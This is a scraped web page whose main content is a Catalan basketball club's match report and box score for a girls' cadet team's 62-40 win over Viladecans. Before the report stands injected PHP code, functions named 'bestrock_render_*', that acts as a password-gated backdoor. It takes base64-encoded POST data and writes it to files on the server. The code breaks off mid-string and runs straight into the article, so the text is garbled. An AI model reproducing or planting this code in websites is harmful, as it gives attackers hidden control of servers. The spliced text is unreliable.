function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet Fem 08A guanya al Viladecans! (62-40) - Tgn Bàsquet Club -

El Cadet Fem 08A guanya al Viladecans! (62-40)

Updated: gener 25, 2024

Primera victòria de la temporada a casa, esperadíssima per tots/es, contra un dels millors equips del grup. Amb el Viladecans ja vam jugar la temporada passada en un partit molt igualat que es van endur les del Baix Llobregat per 3 punts.

Coneixent la nostra fortalesa interior, des del minut 1 de partit, decidim buscar a cada atac a les nostres pivots que poc a poc van superant la defensa del Viladecans. En defensa aconseguim imposar el nostre ritme a tota la pista i ens permet aconseguir un parcial de 8-3 en el marcador. El Viladecans es posa les piles, puja línies defensives i ens impedeixen pujar la pilota amb comoditat, deixem d’anotar. El marcador s’iguala i acabem el primer quart 13-10.

En el segon quart es veu un molt bon partit, els atacs s’imposen a les defenses, cada equip busca en atac la seva millor opció. El parcial és de 21-20, mostrant la igualtat dels dos equips. Acabem a la mitja part encara per davant 34-30.

Al vestidor comentem que la defensa és la que ens ha de fer guanyar el partit. Calia imposar un ritme alt de partit i esgotar a les anotadores visitants. Tot allò que vam aprendre a preferent A, tot i no guanyar, calia posar-ho ara en pràctica. Ritme, velocitat, encert i bones eleccions en atac, ens permeten realitzar un parcial de 20-6 en aquest tercer quart. Deixem el partit bastant decidit però… Calia posar el seny en el darrer quart, el seny que ens va faltar sovint a la primera fase de la temporada.

En el darrer quart ens ho prenem tot amb més calma, imposem un ritme més lent en atac, no arrisquem, cada rebot ofensiu és un tresor que cal guardar i tornar a jugar llarg. Crec que comencem a madurar com a equip. No cal jugar els 40 minuts de la mateixa manera, més si anem per sobre en el marcador. El darrer quart també ens és favorable 8-4. Resultat final 62- 40.

Marxem molt contentes, ja ens tocava guanyar un partit a casa!! Però cal tocar peus a terra! No som ni millors ni pitjors que fa 2 mesos. Cal seguir treballant per poder competir el proper desplaçament a Jet Terrassa. Força TGN!!

CADET FEM 08A 62 – 40 VILADECANS VILABASQUET

13-10; 34-30 ; 54-36 ; 62-40

TGN: DIANA 8 ; JUNY 4, SOFIA 16 ; MARINA 20 , DANIELA 0; HELENA 0 ; JULIA 0 ; ÈLIA 2 ;
MARTA 4, MIREIA 1; LUCIA 3, PAULA 4

VILADECANS: MARTA 2, MIRIAM 11, NOA 9, ALBA 4, CLAUDIA 5, XÈNIA 2, MARIA 1; AINA 5,